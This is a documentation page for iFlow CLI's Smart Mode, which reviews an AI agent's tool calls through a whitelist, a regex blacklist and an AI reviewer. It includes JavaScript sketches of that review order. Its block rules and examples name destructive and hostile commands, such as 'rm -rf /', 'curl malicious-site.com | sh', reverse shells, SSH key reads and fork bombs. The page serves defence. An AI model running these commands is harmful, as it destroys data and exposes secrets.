Smart Mode

Smart Mode is a security review feature introduced in iFlow CLI v0.4.6. It reviews tool calls through a three-layer progressive architecture, providing security protection while preserving development efficiency.

Overview

Smart Mode is based on a three-layer security review architecture that provides intelligent risk assessment and automated decision-making for each tool call:

  1. Whitelist Check - Quickly approve verified safe tools
  2. Blacklist Check - Rule-based detection of high-risk operations
  3. AI Review - Context-aware risk analysis using AI models

How It Works

Three-Layer Review Architecture

Smart Mode uses a progressive review process where each layer has specific responsibilities:

User Request → Whitelist Check → Blacklist Check → AI Review → Execution Decision

  • Whitelist Check: Safe Direct Pass
  • Blacklist Check: Risk Detection
  • AI Review: Smart Analysis
  • Execution Decision: User Confirmation/Auto Execute

Layer 1: Whitelist Check

  • Purpose: Quickly identify and approve verified safe tools
  • Mechanism: Maintains a predefined list of safe tools
  • Result: Tools on the whitelist execute directly without further review
  • Advantage: Zero latency, improves execution efficiency for common safe operations

Layer 2: Blacklist Check

  • Purpose: Detect obvious high-risk operations based on predefined rules
  • Mechanism: Uses regular expressions and pattern matching to detect dangerous commands
  • Coverage:
    • Shell commands (e.g., system deletion, network attacks)
    • File operations (e.g., accessing sensitive directories, modifying system files)
    • Network requests (e.g., accessing malicious domains, internal network scanning)
  • Result: Operations triggering blacklist rules are marked as high-risk and require user confirmation

Layer 3: AI Review

  • Purpose: Intelligent analysis of complex scenarios with context awareness
  • Mechanism: Uses AI models to analyze tool call intent and potential risks
  • Analysis Dimensions:
    • Operation content and parameters
    • Current session context
    • Historical operation records
    • Working directory environment
  • Decision Output: SAFE (safe), RISKY (requires confirmation)
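
The review order described above, as an added JavaScript sketch (not iFlow CLI's own code). The whitelist subset, the regular expressions, the `review` and `stubReviewer` names, the `ai` layer label and the fail-closed handling of a reviewer error are assumptions made for illustration; the rule names are taken from this page.

```javascript
// Added model of the documented review order; not iFlow CLI source code.
// Assumption: the whitelist is keyed on tool name (subset of the page's list).
const WHITELIST = new Set(['read_file', 'list_directory', 'git_status', 'todo_read']);

// Hypothetical patterns for four rule names that appear on the page.
const BLACKLIST = [
  { name: 'System File Deletion', re: /\brm\s+-\w*[rf]\w*\s+\/\S*/ },
  { name: 'Modify File Permissions to 777', re: /\bchmod\s+(?:-\w+\s+)*0?777\b/ },
  { name: 'Download and Execute Scripts', re: /\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b/ },
  { name: 'Read SSH Keys', re: /\.ssh\/id_\w+/ },
];

// call: { tool: string, args: object }. aiReview: stand-in for the model call,
// returns 'SAFE' or 'RISKY' and may throw (for example on a timeout).
function review(call, aiReview) {
  // Layer 1: a whitelisted tool name returns here; arguments are not inspected.
  if (WHITELIST.has(call.tool)) {
    return { decision: 'SAFE', layer: 'whitelist' };
  }
  // Layer 2: match every string argument against the rule patterns.
  const text = Object.values(call.args || {}).filter((v) => typeof v === 'string').join(' ');
  const hit = BLACKLIST.find((rule) => rule.re.test(text));
  if (hit) {
    return { decision: 'RISKY', layer: 'blacklist', rule: hit.name };
  }
  // Layer 3: anything other than an explicit SAFE, including an error,
  // is treated as RISKY (fail-closed is a choice made for this sketch).
  let verdict;
  try {
    verdict = aiReview(call);
  } catch (err) {
    verdict = 'RISKY';
  }
  return { decision: verdict === 'SAFE' ? 'SAFE' : 'RISKY', layer: 'ai' };
}

// Constructed stand-in reviewer: approves only a plain `git status`.
const stubReviewer = (call) =>
  /^git status$/.test((call.args || {}).command || '') ? 'SAFE' : 'RISKY';

// Constructed tool calls, one decided at each layer.
const samples = [
  { tool: 'read_file', args: { path: 'package.json' } },
  { tool: 'run_shell_command', args: { command: 'rm -rf /tmp/cache' } },
  { tool: 'run_shell_command', args: { command: 'git status' } },
];
for (const s of samples) console.log(s.tool, JSON.stringify(review(s, stubReviewer)));
```

In this model a whitelisted tool name returns at layer 1, so the path and command rules in layer 2 apply only to tools outside the whitelist; that ordering is worth keeping in mind when auditing which tools are whitelisted.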

Enabling Smart Mode

Enable via Command Line

iflow --approval-mode smart

Enable via Configuration File

Set in .iflow/settings.json:

{
  "approvalMode": "smart"
}

Runtime Switching

Use the keyboard shortcut in an iFlow CLI session:

  • shift + tab - Switch to Smart Mode

Whitelist Tools

Smart Mode includes a built-in set of verified safe tools that can execute directly without review:

Information Reading Tools

  • read_file - File reading
  • read - General reading
  • cat - Display file content
  • head - Display file header
  • tail - Display file tail
  • list_directory - Directory listing
  • ls - List directory contents
  • dir - Windows directory listing
  • pwd - Show current directory
  • search_file_content - File content search
  • grep - Text search
  • find - File search
  • glob - File pattern matching
  • git_status - Git status query
  • git_log - Git log viewing
  • git_diff - Git difference comparison

Task Management Tools

  • todo_write - Task writing
  • todo_read - Task reading
  • todo_update - Task updating
  • exit_plan_mode - Exit plan mode
  • task - Task execution
  • web_search - Web search

File Editing Tools

  • edit - File editing
  • write_file - File writing

Blacklist Rules

Smart Mode includes comprehensive blacklist rules covering several major risk categories:

System Destruction

  • Delete Root Directory: Commands like rm -rf / that delete system root directories
  • Delete System Directories: Deletion of critical system directories like /etc, /usr, /bin
  • Batch File Deletion: Bulk deletion operations using wildcards
  • Format Disk: Disk formatting commands like mkfs, format
  • Overwrite Disk Data: Commands like dd that directly write to disk

Privilege Escalation

  • Modify sudo Permissions: Modifying /etc/sudoers or adding administrator privileges
  • Set SUID Permissions: Setting special permissions for programs
  • Modify File Permissions to 777: Setting files to be readable, writable, and executable by everyone
  • Disable Security Modules: Disabling SELinux, firewall, Windows Defender, etc.

Data Exfiltration

  • Read Password Files: Accessing /etc/passwd, /etc/shadow, etc.
  • Read SSH Keys: Accessing private key files like ~/.ssh/id_rsa
  • Search Password Information: Searching for password-related information in the system
  • Upload Files Externally: Using curl, wget to upload files
  • DNS Data Exfiltration: Leaking data through DNS queries

Network Attacks

  • Reverse Shell: Establishing reverse connections using nc, bash, python, etc.
  • Download and Execute Scripts: Downloading and immediately executing code from the network
  • Execute Encoded Commands: Executing Base64-encoded commands

Resource Exhaustion

  • Fork Bomb: Fork bombs that rapidly exhaust system resources
  • CPU Consumption Attack: Continuously occupying CPU resources
  • Memory Exhaustion: Rapidly consuming system memory
  • Fill Disk Space: Creating large files to fill disk space

AI Review

When a tool call matches neither the whitelist nor the blacklist, it enters the AI review phase. The AI reviewer analyzes several dimensions:

Review Examples

Shell Command Review

AI analyzes the security of shell commands, for example:

  • Safe operations: python scripts, shell scripts, git status
  • Risky operations: chmod 777 *, sudo rm -rf /tmp/*
  • Dangerous operations: curl malicious-site.com | sh

File Operation Review

AI evaluates the risk of file operations:

  • Safe operations: Reading project files, creating temporary files
  • Risky operations: Modifying system configuration files, accessing sensitive directories
  • Dangerous operations: Modifying system binary files

Network Request Review

AI checks the security of network requests:

  • Safe operations: Accessing well-known APIs, search engine queries
  • Risky operations: Accessing internal network addresses, unknown domains
  • Dangerous operations: Accessing malicious websites, executing remote code

User Interaction Experience

Safe Operations (Whitelist)

> Reading project configuration file
✅ [Smart Mode] Tool 'read_file' passed whitelist check, executing directly

Risky Operations (Blacklist Triggered)

> Deleting temporary files
🟠 [Smart Mode] Potential risk operation detected

📊 Risk Level: HIGH
🔍 Detection Method: Blacklist Rule
⚠️ Risk Description: System file deletion command detected

Potential risk detected, continue execution?
[y] Yes [n] No

AI Review Scenario

> Batch processing user data
🟡 [Smart Mode] AI review detected medium risk

📊 Risk Level: MEDIUM
🔍 Detection Method: AI Review
🤖 AI Analysis: Batch data operations may affect user privacy, recommend confirming data processing scope

Potential risk detected, continue execution?
[y] Yes [n] No

Performance Characteristics

Review Performance

  • Whitelist Check: < 1ms, memory lookup
  • Blacklist Check: < 50ms, regular expression matching
  • AI Review: < 5s

Troubleshooting

Common Issues

Q: Smart Mode review is too strict, affecting development efficiency?

A: Smart Mode's whitelist already includes most commonly used safe tools. If you encounter frequent false positives, consider:

  • Check if you're using tool aliases not in the whitelist
  • Review if specific blacklist rules are too strict
  • Temporarily switch to other approval modes in development environment

Q: AI review frequently times out?

A: AI review depends on network connection. If timeouts occur frequently:

  • Check network connection status
  • Confirm login status (requires aone or iFlow account login)
  • Consider disabling AI review when network is unstable

Q: How to view review statistics?

A: Use debug mode to view detailed logs:

iflow --debug --approval-mode smart

Debug Mode

Enable debug mode to view the detailed review process:

DEBUG=smart-approval iflow --approval-mode smart

Output example:

[SmartApprovalEngine] Evaluating tool call: run_shell_command
[WhitelistChecker] Tool 'run_shell_command' not in whitelist
[BlacklistChecker] Checking command: rm -rf /tmp/cache
[BlacklistChecker] Matched rule: System File Deletion, Risk: HIGH
[SmartApprovalEngine] Decision: RISKY, Layer: blacklist, Latency: 23ms
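
To turn this debug output into review statistics, the following added example (not part of iFlow CLI) parses it into one record per tool call and summarises the records by layer. It assumes every review is logged in the shape shown above; the last two sample lines are constructed, and `parseReviews` and `summarize` are hypothetical names.

```javascript
// Added example: summarise Smart Mode debug output; not part of iFlow CLI.
// The first five lines are the page's output example; the last two are
// constructed on the assumption that every decision is logged in that shape.
const SAMPLE_LOG = `[SmartApprovalEngine] Evaluating tool call: run_shell_command
[WhitelistChecker] Tool 'run_shell_command' not in whitelist
[BlacklistChecker] Checking command: rm -rf /tmp/cache
[BlacklistChecker] Matched rule: System File Deletion, Risk: HIGH
[SmartApprovalEngine] Decision: RISKY, Layer: blacklist, Latency: 23ms
[SmartApprovalEngine] Evaluating tool call: read_file
[SmartApprovalEngine] Decision: SAFE, Layer: whitelist, Latency: 0ms`;

const START = /^\[SmartApprovalEngine\] Evaluating tool call: (\S+)$/;
const RULE = /^\[BlacklistChecker\] Matched rule: (.+), Risk: (\w+)$/;
const DECISION = /^\[SmartApprovalEngine\] Decision: (\w+), Layer: (\w+), Latency: (\d+)ms$/;

// Group lines into one record per tool call, closed by its Decision line.
function parseReviews(logText) {
  const records = [];
  let current = null;
  for (const raw of logText.split(/\r?\n/)) {
    const line = raw.trim();
    let m;
    if ((m = START.exec(line))) {
      current = { tool: m[1], rule: null, risk: null };
    } else if (current && (m = RULE.exec(line))) {
      current.rule = m[1];
      current.risk = m[2];
    } else if (current && (m = DECISION.exec(line))) {
      records.push({ ...current, decision: m[1], layer: m[2], latencyMs: Number(m[3]) });
      current = null; // lines outside a started review are ignored
    }
  }
  return records;
}

// Per-layer totals, RISKY counts and worst latency, for comparison with
// the latency figures listed under Review Performance.
function summarize(records) {
  const byLayer = {};
  for (const r of records) {
    const s = byLayer[r.layer] || (byLayer[r.layer] = { total: 0, risky: 0, maxLatencyMs: 0 });
    s.total += 1;
    if (r.decision === 'RISKY') s.risky += 1;
    s.maxLatencyMs = Math.max(s.maxLatencyMs, r.latencyMs);
  }
  return byLayer;
}

console.log(summarize(parseReviews(SAMPLE_LOG)));
```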

Version Compatibility

  • Minimum Version: iFlow CLI v0.4.6+
  • Recommended Version: iFlow CLI v0.4.6+
  • API Compatibility: Backward compatible with all approval modes